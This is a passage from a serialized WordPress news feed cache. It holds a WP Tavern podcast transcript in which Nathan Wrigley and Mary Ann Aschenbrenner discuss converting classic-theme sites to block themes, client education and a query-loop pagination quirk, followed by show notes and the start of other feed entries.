Is like that a big part of it?</p>\n\n\n\n<p>[00:10:22] <strong>Mary Ann Aschenbrenner:</strong> I&#8217;ve never used page builders. And I have friends in the industry who love page builders, rely on page builders, and I have happy clients and I&#8217;ve never used a page builder. And the site is unique to them. I don&#8217;t feel like adding on another layer.</p>\n\n\n\n<p>I&#8217;ve had to change over websites where a page builder was used, and it was very heavy, and slow because there was so much code. And back in the day, an individual who was vision impaired couldn&#8217;t use it because the web reader that they were using couldn&#8217;t read through all this extra code. I just never used it for that reason.</p>\n\n\n\n<p>But I&#8217;m sure they&#8217;re better now. I do believe that, but you don&#8217;t need them. When you have the block editor, you don&#8217;t need a page builder.</p>\n\n\n\n<p>[00:11:06] <strong>Nathan Wrigley:</strong> Are there any situations in which you wouldn&#8217;t ascribe the necessity to move over to a more modern, block based theme? In other words, is there any scenario where you look at somebody that&#8217;s on a classic theme and you say, you know what, just stay where you are, everything&#8217;s fine? Or are you always keen to promote people to move in this direction?</p>\n\n\n\n<p>[00:11:25] <strong>Mary Ann Aschenbrenner:</strong> I&#8217;m not always keen to promote people. So I have a client who, oh gosh, she was part of the second wave feminist movement, and has a really great website people love. I built it for her in like 2015 and it&#8217;s still working fine. She can stay on it. She&#8217;s comfortable with it. You know, there&#8217;s no reason really, if it starts being an issue with the PHP levels and so forth, then I&#8217;ll talk to her about it.</p>\n\n\n\n<p>[00:11:51] <strong>Nathan Wrigley:</strong> Yeah, I suppose there&#8217;s also, given the trends in graphic design and the way websites look, there&#8217;s always a moment in time where your website just begins to look stale on the front end.</p>\n\n\n\n<p>[00:11:59] <strong>Mary Ann Aschenbrenner:</strong> Or it looks retro, or it looks cool. And the others all look the same. So there&#8217;s always that.</p>\n\n\n\n<p>[00:12:05] <strong>Nathan Wrigley:</strong> So that, if you like, was more about the why of you may wish to move over to a, away from a classic theme.</p>\n\n\n\n<p>So let&#8217;s move into the sort of the how then because that I think is the crux of your presentation really, how to do it and you need to demonstrate on the screen and what have you. So let&#8217;s go through that process. What is the first thing that you do when you are looking to transfer somebody over?</p>\n\n\n\n<p>[00:12:25] <strong>Mary Ann Aschenbrenner:</strong> Well, the first thing you do is you set up a staging site. I&#8217;m not saying doing this live. Bring up a staging site on your server. It&#8217;s your same website and all it is is the new URL that says staging, dot, blah, blah, whatever.</p>\n\n\n\n<p>Then after your staging site is up, you activate your 2025 theme. You may want to use 2024. 2024 is a really good theme as well. I think the patterns in 2024 are maybe a little more geared toward business, and the patterns in 2025 may be a little more geared towards personal blogs and artists. But pick one.</p>\n\n\n\n<p>So you have now have the 2025 theme, and it&#8217;s going to look very plain because it&#8217;s just plain until you fix it. And the next thing I usually do is I go through and start editing the pages. So a lot of my old themes, I put in the classic editor plugin. Remember the classic editor plugin?</p>\n\n\n\n<p>[00:13:18] <strong>Nathan Wrigley:</strong> I do, yeah.</p>\n\n\n\n<p>[00:13:19] <strong>Mary Ann Aschenbrenner:</strong> Yeah, we were afraid of block editor so we all put classic editor on. And so it kind of keeps it looking classic. And, well, you deactivate that. And then when you go to a page or a blog post, you&#8217;ll see a little greyed block on the top of that content that says classic editor. You click it, and then it&#8217;ll say, convert to blocks. And this is where you just do it. You say, yes, I&#8217;m going to convert to blocks. You click it, and you got blocks.</p>\n\n\n\n<p>Now, where you are going to find problems? But first of all, most of it deploys really well. Paragraphs deploy, they&#8217;re still paragraphs. Headers deploy, they&#8217;re still headers, et cetera, et cetera. But where you have columns, your original theme may have used some sort of a short code for columns that&#8217;s different than a block editor. So that may not convert.</p>\n\n\n\n<p>Where you have embedded YouTube videos or something, you may decide to do them differently using the YouTube embed plugin instead of whatever code comes up. And you&#8217;ll get a little, if a paragraph doesn&#8217;t convert well or a block doesn&#8217;t convert well, it&#8217;ll say, you&#8217;ll know that.</p>\n\n\n\n<p>But you still have your live site. So you can go there and find the content and put it back in. You know, it would would be cut and paste if you may have to chase down a YouTube link to embed a YouTube video. But it is all very doable and it&#8217;s pretty fast. It doesn&#8217;t take that long. I had a website with 200, over 200 blog posts that I had to do that on. That took a little while. But it was 200 blog posts, more than that actually. But for just a standard website with a dozen or so pages, it&#8217;s not hugely time consuming.</p>\n\n\n\n<p>[00:14:54] <strong>Nathan Wrigley:</strong> I guess the only problems that may occur is if some part of the, well, let&#8217;s say theme, but it may be a plugin, but it may be part of the theme was injecting something somewhere. And in the classic editor you don&#8217;t see it, but it somehow surfaces on the front end. I don&#8217;t know, it may be the insertion of an ad or something like that. And then you may run into problems because you can&#8217;t see where that content&#8217;s coming from.</p>\n\n\n\n<p>But I suppose in your scenario, you&#8217;re just flicking backwards and forwards between the current live site, which is the classic one, and then you&#8217;ve got your staging site, which is the block based one. I guess it&#8217;s just a jigsaw puzzle really. You&#8217;re trying to figure out, okay, why is that missing? Where does that come from? How can I deploy it in blocks and go through that process? And hopefully on each iteration you get more and more back to what the original content was.</p>\n\n\n\n<p>[00:15:38] <strong>Mary Ann Aschenbrenner:</strong> Right, exactly. That&#8217;s how you do it.</p>\n\n\n\n<p>[00:15:40] <strong>Nathan Wrigley:</strong> Yeah. And so it&#8217;s a process of going through it kind of one at a time.</p>\n\n\n\n<p>Have you ever encountered something which you couldn&#8217;t solve in that scenario? Have you ever come across something where you just throw your hands in the air and think, what, where&#8217;s that?</p>\n\n\n\n<p>[00:15:50] <strong>Mary Ann Aschenbrenner:</strong> One time. So I had a website on a Studio Press theme, and I did the conversion. It all looked good to me. And then I realised when you were not logged into the site, the navigation didn&#8217;t show up properly. And I tried to figure that out and I redid the navigation. It looked good when you&#8217;re logged in, but when you&#8217;re just looking at the site not logged in, it wasn&#8217;t. So I ended up actually rebuilding that site entirely.</p>\n\n\n\n<p>[00:16:16] <strong>Nathan Wrigley:</strong> Oh, interesting.</p>\n\n\n\n<p>[00:16:17] <strong>Mary Ann Aschenbrenner:</strong> I just went ahead and brought up a whole new 2025 theme and copied and pasted content and brought it over.</p>\n\n\n\n<p>[00:16:23] <strong>Nathan Wrigley:</strong> Okay, so rather than having a staging site, well, you presumably did have a staging site, but it wasn&#8217;t a case of going into the posts or the pages and clicking the convert button. This more of a, okay, something&#8217;s broken here, I need to start from scratch.</p>\n\n\n\n<p>[00:16:34] <strong>Mary Ann Aschenbrenner:</strong> Something&#8217;s broken, I couldn&#8217;t figure it, I mean, I&#8217;m sure if I were a coder, I would&#8217;ve dug into the code. But it&#8217;s like, it&#8217;s going to take me hours, it&#8217;s going to be easier in this case. It didn&#8217;t have a ton of content. There was like six or eight pages and maybe four or five blog posts. So it wasn&#8217;t that hard to do. It was easier to just bring up the new 2025 theme and start fresh.</p>\n\n\n\n<p>[00:16:54] <strong>Nathan Wrigley:</strong> Yeah, in the scenario where you&#8217;ve only got a handful of pages, it probably is literally quicker to do it that way and copy and paste.</p>\n\n\n\n<p>[00:16:58] <strong>Mary Ann Aschenbrenner:</strong> Especially if you see an issue pop up immediately. It&#8217;s something, the navigation, I couldn&#8217;t figure out why that wasn&#8217;t working. But it was a Studio Press theme, so something was coming through from the old theme.</p>\n\n\n\n<p>[00:17:09] <strong>Nathan Wrigley:</strong> Okay. And you mentioned that this whole process where you, you go to your staging site and you go into a post or a page, and there&#8217;s this bar at the top. The content is missing essentially. And there&#8217;s this bar, it&#8217;s a grey bar and it looks.</p>\n\n\n\n<p>[00:17:23] <strong>Mary Ann Aschenbrenner:</strong> Well, the content is usually there.</p>\n\n\n\n<p>[00:17:24] <strong>Nathan Wrigley:</strong> Yeah, but it&#8217;s all in the wrong, it&#8217;s as it was essentially. So it&#8217;s not yet as blocks. And you click the button, wait a heartbeat, a moment, and the WordPress sort of process of migrating one to the other just sort of takes over. Paragraphs become paragraphs blocks, and on you go. I&#8217;ve yet to have that fail on me in a catastrophic way. It&#8217;s never done anything unexpected.</p>\n\n\n\n<p>[00:17:45] <strong>Mary Ann Aschenbrenner:</strong> It&#8217;s never failed catastrophically, not on me. And I&#8217;ve converted, even on that one website I just mentioned, the content converted great. It was just the navigation that was the issue. But I&#8217;ve used Canvas theme, which used to be produced by WooCommerce before it became a part of WordPress. And I&#8217;ve used, of course another theme on, that another website. So that content comes through actually, really easily.</p>\n\n\n\n<p>[00:18:09] <strong>Nathan Wrigley:</strong> You mentioned also that you are using the default theme in most cases. So you mentioned 2025, but also you said, I think perhaps try 2024 or something like that. Is that your kind of go-to? Do you explore the ecosystem of other themes that are out there in the environment, either the repo or possibly commercial themes, or you just heavily leaning into default themes?</p>\n\n\n\n<p>[00:18:28] <strong>Mary Ann Aschenbrenner:</strong> I just lean into the default theme.</p>\n\n\n\n<p>[00:18:29] <strong>Nathan Wrigley:</strong> Is there any particular reason for that? Because obviously, you know it&#8217;s going to be updated, which is really nice. You know that it&#8217;s a, well, it&#8217;s deployed on every WordPress website, a standard if you download a vanilla version of WordPress.</p>\n\n\n\n<p>[00:18:39] <strong>Mary Ann Aschenbrenner:</strong> It&#8217;ll be maintained for a long, long time. I know somebody who&#8217;s still in the 2015 theme and their site still works great.</p>\n\n\n\n<p>[00:18:47] <strong>Nathan Wrigley:</strong> Yeah, the backwards compatibility promise of WordPress is pretty remarkable.</p>\n\n\n\n<p>[00:18:51] <strong>Mary Ann Aschenbrenner:</strong> It&#8217;s pretty remarkable.</p>\n\n\n\n<p>[00:18:52] <strong>Nathan Wrigley:</strong> Yeah. Have you found limitations in those themes though? So one of the things that I think people wish were better would be, for example, things like navigation. You know, the options that you have in default blocks for navigation. Currently, there&#8217;s quite a lot of work going on to improve that as it happens. But are there any limitations that you&#8217;ve encountered where you thought, I wish it could do more?</p>\n\n\n\n<p>[00:19:12] <strong>Mary Ann Aschenbrenner:</strong> I haven&#8217;t with the 2025, not recently anyway. But with 2024, I used a little bit of CSS in the navigation block. So add a little CSS.</p>\n\n\n\n<p>[00:19:21] <strong>Nathan Wrigley:</strong> Yeah, just tweak it a little bit. There&#8217;s a lot of requirements for maybe, I don&#8217;t know, mega menus, things like that, adaptations to the mobile menu that are not available in the blocks. And as we&#8217;re leaning more into kind of like a no code environment with block based themes.</p>\n\n\n\n<p>[00:19:35] <strong>Mary Ann Aschenbrenner:</strong> I have used a plugin for mega menus on one of my clients.</p>\n\n\n\n<p>[00:19:37] <strong>Nathan Wrigley:</strong> Okay. So you take care of that in a different way by using plugins? Yeah, okay. That kind of makes sense.</p>\n\n\n\n<p>Okay, so that&#8217;s the bits and pieces perhaps about the sort of how you do it.</p>\n\n\n\n<p>[00:19:46] <strong>Mary Ann Aschenbrenner:</strong> And the reason I used the mega menu plugin for that client was he had very specific ideas of how he wanted his navigation to look on cell phone.</p>\n\n\n\n<p>[00:19:54] <strong>Nathan Wrigley:</strong> Yeah, because it is fairly limited what you get out of the box. There&#8217;s not too many options and think the community is possibly moving towards having something a little bit better in the, yeah, a bit more full featured, let&#8217;s put it that way.</p>\n\n\n\n<p>It&#8217;s a curious question, do you see any need for more than a single theme in the WordPress space anymore? So in other words, now that we&#8217;re leaning into an era where all of the bits and pieces that would&#8217;ve been handled by the theme is now handled by the interface of the block-based theme. So, for example, all of your templates is within the UI of full site editing and what have you. Do we even need a whole bunch of themes?</p>\n\n\n\n<p>Could we just have a single theme which did the bare bones, maybe headers, footers, menus, that kind of thing. And then all of it is done by patterns or templates, which can be pointed on and clicked in, in the interface?</p>\n\n\n\n<p>[00:20:44] <strong>Mary Ann Aschenbrenner:</strong> Well, I think that it&#8217;s good to have themes, and I&#8217;ll tell you why. My daughter&#8217;s wedding photographer. She is not a website designer. You know, she was used to using Squarespace, realised that the SEO on it sucked and decided to go to WordPress and found a great photography theme from a good maker of themes. I had no problem with it. I looked at it. And all she needed was a little tip on how to see where her blocks were and what the block is. She&#8217;s just going to be able to go with that.</p>\n\n\n\n<p>Now if she was starting from scratch with no theme to work with, and just trying to figure it out, I think it&#8217;d be a lot harder for her. But having a template that&#8217;s like, here&#8217;s your photography template, she can put her own pictures in there. She understands the concept, and she&#8217;ll be able to build her own website with it.</p>\n\n\n\n<p>[00:21:36] <strong>Nathan Wrigley:</strong> Do you find it&#8217;s easier for your clients then to work with the block based themes than it was with the classic themes?</p>\n\n\n\n<p>[00:21:43] <strong>Mary Ann Aschenbrenner:</strong> Yes.</p>\n\n\n\n<p>[00:21:44] <strong>Nathan Wrigley:</strong> I find sometimes it&#8217;s difficult to kind of work out where you are in the UI. You know, you&#8217;ve clicked on a bunch of things and you can&#8217;t figure out how to get back to where you were, things like that. But then if I weigh that up against how difficult it was with classic themes, where you had to basically have a code editor open at some point and be editing template, PHP files, and things like this. Although it&#8217;s a bit confusing navigating around the UI, I think even the people developing WordPress would say, yes, there&#8217;s a bit of work to be done on the UI. I think on the whole, it&#8217;s much easier, but I don&#8217;t know what your clients think.</p>\n\n\n\n<p>[00:22:13] <strong>Mary Ann Aschenbrenner:</strong> You know how I explained to my clients, I said, if you use Mac, can you put together a Pages document and maybe add some images, can you do that? And they say, yes. I said, well, if they&#8217;re using Microsoft, can you do the same thing? Yes, I can. Well, then you can use the block theme.</p>\n\n\n\n<p>Because once it&#8217;s set up, I mean, I think that there&#8217;s certain areas that are a little more tricky and for our clients, I&#8217;ll say, look, don&#8217;t get into the editor. Do not do full site editing. Let me do that. If you want to add something to the navigation, just tell me, I&#8217;ll edit it. It&#8217;s not a big deal. It takes me five minutes. They&#8217;re going to have to figure it out, because it&#8217;s only something they&#8217;re going to do once in a while when they change their navigation.</p>\n\n\n\n<p>But for any of their pages, you know, they know how to hit the three lines, see what block they&#8217;re in, click it, it lights up the block on the right hand side, and then they can do the editing to the right of that. They can do it.</p>\n\n\n\n<p>[00:23:03] <strong>Nathan Wrigley:</strong> Do you lean into the feature of locking blocks? Because it sounds like you&#8217;ve got a fairly close relationship with your clients. You&#8217;re probably able to get on the phone with them and things like that, have that communication. So you can just say, don&#8217;t touch that, leave that alone, and that&#8217;s fine.</p>\n\n\n\n<p>But obviously in different scenarios where, I don&#8217;t know, it might be more corporate, that kind of thing, the capacity within native WordPress to exclude the client from being able to edit that.</p>\n\n\n\n<p>So as an example, yeah, you can change the text on that block, but it&#8217;s a cover block, but we&#8217;re not going to allow you to change the background image. Or conversely, you can change the background image, but you can&#8217;t change the text, those kind of things. So these are sort of new features which have crept in over time, and I&#8217;m not sure how many people use those, whether or not that would be of interest to you and your clients.</p>\n\n\n\n<p>[00:23:45] <strong>Mary Ann Aschenbrenner:</strong> You know, it&#8217;s their website. They may be on my servers that I&#8217;m hosting, but it&#8217;s their website and if they really want to mess it up, they can. And I can fix it. But really, it&#8217;s not a problem.</p>\n\n\n\n<p>There&#8217;s been a few times, I have one client who adds content and he happened to add it all in tables. I don&#8217;t know why or how. I had to fix it on one of his pages. But, you know, I fixed it and the content is there down and it&#8217;s not in a table.</p>\n\n\n\n<p>[00:24:10] <strong>Nathan Wrigley:</strong> Do you build into your process, when you have converted something from classic to block base, do you have like an education piece in the middle there somewhere?</p>\n\n\n\n<p>[00:24:18] <strong>Mary Ann Aschenbrenner:</strong> Oh, yes.</p>\n\n\n\n<p>[00:24:19] <strong>Nathan Wrigley:</strong> So time to show the client how to use it. Because obviously they may be very familiar with classic editing, or it may be something that they&#8217;re not really dabbling in that much. Either way, it&#8217;s not at all like the new thing. And how do you do that? Do you allocate time? Do you have videos prepared or just sit next to them in their offices?</p>\n\n\n\n<p>[00:24:35] <strong>Mary Ann Aschenbrenner:</strong> You know, we usually do it as like a Zoom call. They share their screen. Well, actually, during the process, there&#8217;ll be times when I&#8217;m on the phone in a Zoom call with the client or a Google Meet call with the client, and I&#8217;m showing them what I&#8217;m doing on my end. So that&#8217;s part of the education process.</p>\n\n\n\n<p>And we talk about, okay, do you like this font? No, I don&#8217;t like this one. Okay, well, how about this one? They see me change things back and forth. I put up content and they say, oh, we want to edit that. We want to rephrase it like this.</p>\n\n\n\n<p>So if we&#8217;re doing it on a Zoom call, it&#8217;s going back and forth, they see how I&#8217;m working. And I make a point, oh, see how I hit these three lines, and we can edit this paragraph block, let&#8217;s put a background on this paragraph block. Here&#8217;s how you do it. So they learn how to do that, just kind of as we&#8217;re building it.</p>\n\n\n\n<p>And then when it&#8217;s done, I will definitely show them how, anything they want to change. And I&#8217;ll walk through them how to add a blog post, for example. Usually the pages are pretty dialed in by the time we go live, it&#8217;s exactly where they want. So they might need to learn how to add blog posts. And I&#8217;ll introduce them to the blocks I think they&#8217;re going to use. They don&#8217;t need to know how to do every single block because there&#8217;s so many blocks.</p>\n\n\n\n<p>[00:25:46] <strong>Nathan Wrigley:</strong> Yeah. Do you switch some of them off, make them unavailable? I don&#8217;t know, there&#8217;s things like the Animoto Block, which goodness knows whoever was using that, I don&#8217;t know. But it&#8217;s there. I think most clients don&#8217;t need them. And having the capacity to switch some blocks off, quite a nice idea.</p>\n\n\n\n<p>[00:26:00] <strong>Mary Ann Aschenbrenner:</strong> You can. I haven&#8217;t done that.</p>\n\n\n\n<p>[00:26:01] <strong>Nathan Wrigley:</strong> No, okay. And are there any common gotchas? When you&#8217;ve gone through this process multiple times, is there anything which comes out the other end which is reliably strange to the client? You know, okay every client&#8217;s reporting back either, nothing, this is brilliant, it&#8217;s a hundred percent, I&#8217;m all on board. Or do you have common things which you have to explain over and over again to the different clients because it&#8217;s just quirky?</p>\n\n\n\n<p>[00:26:21] <strong>Mary Ann Aschenbrenner:</strong> There&#8217;s a couple clients that are boards, nonprofit boards, and so then I have to explain it over and over again.</p>\n\n\n\n<p>[00:26:29] <strong>Nathan Wrigley:</strong> And is that because of the nature of.</p>\n\n\n\n<p>[00:26:31] <strong>Mary Ann Aschenbrenner:</strong> Because the person I&#8217;m talking to changes.</p>\n\n\n\n<p>[00:26:33] <strong>Nathan Wrigley:</strong> Oh, okay.</p>\n\n\n\n<p>[00:26:34] <strong>Mary Ann Aschenbrenner:</strong> Sometimes clients will want something I don&#8217;t really feel like I can deliver. So I have a client who wants full with image, with content on top of it, and wants it to be a slider. So there&#8217;ll be a full width image with content and a button, and then another full width image with content and a button. It&#8217;s a slider. So I created this.</p>\n\n\n\n<p>And then when it was done, they were like, well, I want the whole image to show on a cell phone. I had to explain, if that entire image gets so narrow that it shows on a cell phone and it&#8217;s not very tall, your content won&#8217;t fit in it. And it was really hard to accept. So that kind of thing can occur.</p>\n\n\n\n<p>[00:27:12] <strong>Nathan Wrigley:</strong> Yeah, I mean, it&#8217;s not for everybody, but I feel at this point, this is the future of WordPress. This is the way it&#8217;s going to go. This is what most people are talking about and what have you. Just getting into your presentation later, firstly, good luck with it. I hope it goes well.</p>\n\n\n\n<p>[00:27:26] <strong>Mary Ann Aschenbrenner:</strong> Thank you.</p>\n\n\n\n<p>[00:27:27] <strong>Nathan Wrigley:</strong> How are you tackling this subject? Are you going to be doing slides? Because it&#8217;ll be curious, the audience, presumably in front of you are, well, we&#8217;re at WordCamp. Presumably they are a bunch of WordPressers. I&#8217;m curious to know at what level you are pitching it.</p>\n\n\n\n<p>[00:27:39] <strong>Mary Ann Aschenbrenner:</strong> You know, I think somebody who&#8217;s fairly new to WordPress will be able to get a lot out of this. I think it&#8217;s geared towards somebody with a little bit of experience, not a lot.</p>\n\n\n\n<p>I&#8217;m going to talk about three different websites. One of them was actually built in 2006 on Blogger. I wasn&#8217;t the one that built it. And two other websites. And I&#8217;m going to talk a little bit about the City of Portland, so people who come to this, even if they know everything I&#8217;m talking about will learn a little bit about the City of Portland.</p>\n\n\n\n<p>[00:28:05] <strong>Nathan Wrigley:</strong> And this is all filmed as well, which is kind of nice. And these days those videos tend to get turned around pretty quickly. Long gone is the day that you would attend a WordCamp and then six months, a year later, the video would still be stuck in somebody&#8217;s hard disk.</p>\n\n\n\n<p>Hopefully by the time this podcast episode drops, that will be out and we&#8217;ll be able to watch your presentation. I think I&#8217;ve asked everything that I wish to ask. Is there anything that you think that we didn&#8217;t touch during our conversation?</p>\n\n\n\n<p>[00:28:31] <strong>Mary Ann Aschenbrenner:</strong> There is.</p>\n\n\n\n<p>[00:28:31] <strong>Nathan Wrigley:</strong> Go for it.</p>\n\n\n\n<p>[00:28:32] <strong>Mary Ann Aschenbrenner:</strong> While I was building the site with 200 blog posts, I discovered a little, what I thought was a glitch. And it turns out it&#8217;s a feature. But if you were a developer, you think it&#8217;s a feature. So in the 2025 theme, when you go to templates, you go to your website editor and you go to patterns, and then you have the header, the footer, and the page templates.</p>\n\n\n\n<p>For the blog page, I pick a page template for the blog page, just that one. And then I can go in and I can select the style of my query loop. So if I want a query loop that&#8217;s just a picture on the left and content on the right for that blog page, and then people can scroll through and see all the different blog posts.</p>\n\n\n\n<p>I picked one that was different than that. So I picked it, and then I deployed it, and then I went to the blog page and looked at it and it looked great. Except when I hit next page, it returned to the same page. It never was advancing to all these other 200 blog posts. And I was like, what happened here?</p>\n\n\n\n<p>So I went back to the template, page, templates, blog page, picked a different query loop. Same thing. Picked a third query loop. Ah, this one worked. I could advance to the next pages. So then I was curious, why is this?</p>\n\n\n\n<p>So I went back to that template, hit the three line dropdown arrow, looked at every single block in there and saw a pagination block that had not been in the others at the bottom of the group. So then I copied that and I put it in. And voila, my original one worked, I was very happy with it.</p>\n\n\n\n<p>So I went yesterday to the Contributor Day and I sat at the Core Performance table, and normally not where I would belong, and said, this is your issue, it&#8217;s got to be fixed. And they looked at it, and a couple more people looked at it, and then they explained to me that not all query loops are used on the blog page. Some might be used on a landing page. And you may not want a next pages on every one of your query loops, so it&#8217;s not there on everyone.</p>\n\n\n\n<p>[00:30:53] <strong>Nathan Wrigley:</strong> It&#8217;s kind of interesting that it got there on one of them. And I think this is something that can be quite confusing, things like that, which in the old world, you would&#8217;ve dropped in as a short code. And in order to get that short code, you would&#8217;ve gone into some other UI and configured it all, and then the short code would&#8217;ve been spat out with the correct parameters to do what you wanted. So there might have been a toggle for show pagination, take pagination off, and what have you. And then the short code would ultimately do that.</p>\n\n\n\n<p>In the block editor, this kind of thing happens fairly frequently in that there are nested blocks. And if you don&#8217;t deploy the nested blocks, so for example, if you didn&#8217;t know that pagination was a separate block, which usually sits outside of the query loop, usually below it in the same group or something like that, it&#8217;s easy to think, well, it ought to be there. Why isn&#8217;t it there? And sometimes you have to go find that pagination block, insert it in the right place and what have you.</p>\n\n\n\n<p>Yeah, so things like that, if you don&#8217;t see it, you don&#8217;t see it. It&#8217;s not intuitive to think that it ought to be there. And I can think of probably dozens of examples of that kind of thing where blocks that you may rely on are in fact nested blocks of other blocks, and they may not come in automatically.</p>\n\n\n\n<p>So, yeah, it&#8217;s a process of figuring that out, and maybe a toggle inside the query loop block saying, just enable pagination, turn it off, or something like that.</p>\n\n\n\n<p>[00:32:11] <strong>Mary Ann Aschenbrenner:</strong> That might be helpful. But I was able to fix it, and I realise now that it actually is a feature because they can, you can go to those query loops and look at all sorts of query loops that you might use elsewhere on your website. So I thought it was great to go to Contributor Day. I contributed and I learned.</p>\n\n\n\n<p>[00:32:28] <strong>Nathan Wrigley:</strong> Yeah, that&#8217;s really nice. And people were able to explain it to you. Yeah, definitely a thing if you come to a WordCamp, certainly of this magnitude, attend the Contributor Day. And it&#8217;s not just a process of contributing, it can be a process of sitting next to people who are working and asking them questions and thereby upping your own knowledge.</p>\n\n\n\n<p>[00:32:44] <strong>Mary Ann Aschenbrenner:</strong> And I don&#8217;t think that they were aware of it until I pointed it out.</p>\n\n\n\n<p>[00:32:47] <strong>Nathan Wrigley:</strong> Yeah, they&#8217;re in the weeds of deploying it, and they may not consider all the use cases. And in this case, you had one in which it didn&#8217;t work as expected. I guess from their point of view, everything that they said is probably true. You know, it may be deployed in this way, it may not, and so we built it in such a way that you can have the pagination or not, but nevertheless, you kind of needed it right away.</p>\n\n\n\n<p>Well, that&#8217;s brilliant. Thank you so much Mary. Appreciate you chatting to me today.</p>\n\n\n\n<p>Where can we find you if people would like to reach out about anything you&#8217;ve talked about? Where&#8217;s the best places?</p>\n\n\n\n<p>[00:33:14] <strong>Mary Ann Aschenbrenner:</strong> On my website is waterlinkweb.com. You can find me there. I&#8217;m on Instagram at Water Link Web. I have a LinkedIn, Mary Ann Aschenbrenner at LinkedIn. And I think that does it.</p>\n\n\n\n<p>[00:33:28] <strong>Nathan Wrigley:</strong> Well, thank you very much. I&#8217;ll make sure all those bits and pieces get into the show notes. So head to wptavern.com, search for the episode with Mary Ann Aschenbrenner. I will hopefully speak to you another time. Thank you very much for chatting to me.</p>\n\n\n\n<p>[00:33:40] <strong>Mary Ann Aschenbrenner:</strong> Thank you very much, Nathan.</p>\n</div></details>\n\n\n\n<p>On the podcast today we have <a href=\"https://www.linkedin.com/in/maryannaschenbrenner/\">Mary Ann Aschenbrenner</a>.</p>\n\n\n\n<p>Mary Ann has been the President of Waterlink Web, a digital agency specialising in WordPress web design since 2014. Her experience includes e-Commerce and membership websites, websites for local nonprofit organisations, and starter websites for small businesses. As a life-long learner, Mary Ann likes to keep pace with the latest innovations in WordPress. She is a fan of block themes and particularly the WordPress default themes.</p>\n\n\n\n<p>We start by discussing the differences between classic and block themes, with Mary Ann offering practical, step-by-step advice for anyone considering a move from a classic theme to a modern block-based theme. She talks about why you might want to make the switch, potential challenges to look out for, and stories from her own experience converting client sites.</p>\n\n\n\n<p>We also chat about the evolution of WordPress, the diminishing need for third-party page builders, the importance of client education, and the ongoing improvements in the block editor. Plus, Mary Ann shares insights from her WordCamp presentation, and her experiences collaborating with the WordPress community.</p>\n\n\n\n<p>Whether you’re a seasoned WordPresser, or are just starting out, and keen to know how block themes are making site building more accessible for everyone, this episode is for you.</p>\n\n\n\n<h2 class=\"wp-block-heading\">Useful links</h2>\n\n\n\n<p><a href=\"https://www.linkedin.com/in/maryannaschenbrenner/overlay/about-this-profile/\">Mary Ann Aschenbrenner</a> on LinkedIn</p>\n\n\n\n<p><a href=\"https://waterlinkweb.com/\">Waterlink Web</a></p>\n\n\n\n<p><a href=\"https://friendsofpierpark.org/\">Friends of Pier Park website</a></p>\n\n\n\n<p><a href=\"https://us.wordcamp.org/2025/session/moving-a-website-from-classic-to-a-block-theme/\">Moving a Website from Classic to a Block Theme</a></p>\n\n\n\n<p><a href=\"https://www.studiopress.com/\"> StudioPress</a></p>\n\n\n\n<p><a href=\"https://www.blogger.com/\">Blogger</a></p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 17 Sep 2025 14:00:00 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Nathan Wrigley\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:13;a:6:{s:4:\"data\";s:21:\"\n	\n	\n	\n	\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:113:\"Open Channels FM: How to Make Your Open Web Content Last Forever: Effortless, Permanent Backups and Media Storage\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:33:\"https://openchannels.fm/?p=108637\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:118:\"https://openchannels.fm/how-to-make-your-open-web-content-last-forever-effortless-permanent-backups-and-media-storage/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:360:\"The open web is a patchwork of ideas, creativity, and discovery that thrives on its openness and diversity. But what happens when websites go offline, hosting bills lapse, or platforms disappear? The reality is that content is lost every day to link rot, expired services, and vanished archives while silently erasing important stories and knowledge. [&#8230;]\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 17 Sep 2025 13:29:01 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:5:\"BobWP\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:14;a:6:{s:4:\"data\";s:21:\"\n	\n	\n	\n	\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:90:\"Open Channels FM: GoDaddy’s New AI Site Designer: From Idea to WordPress Site in 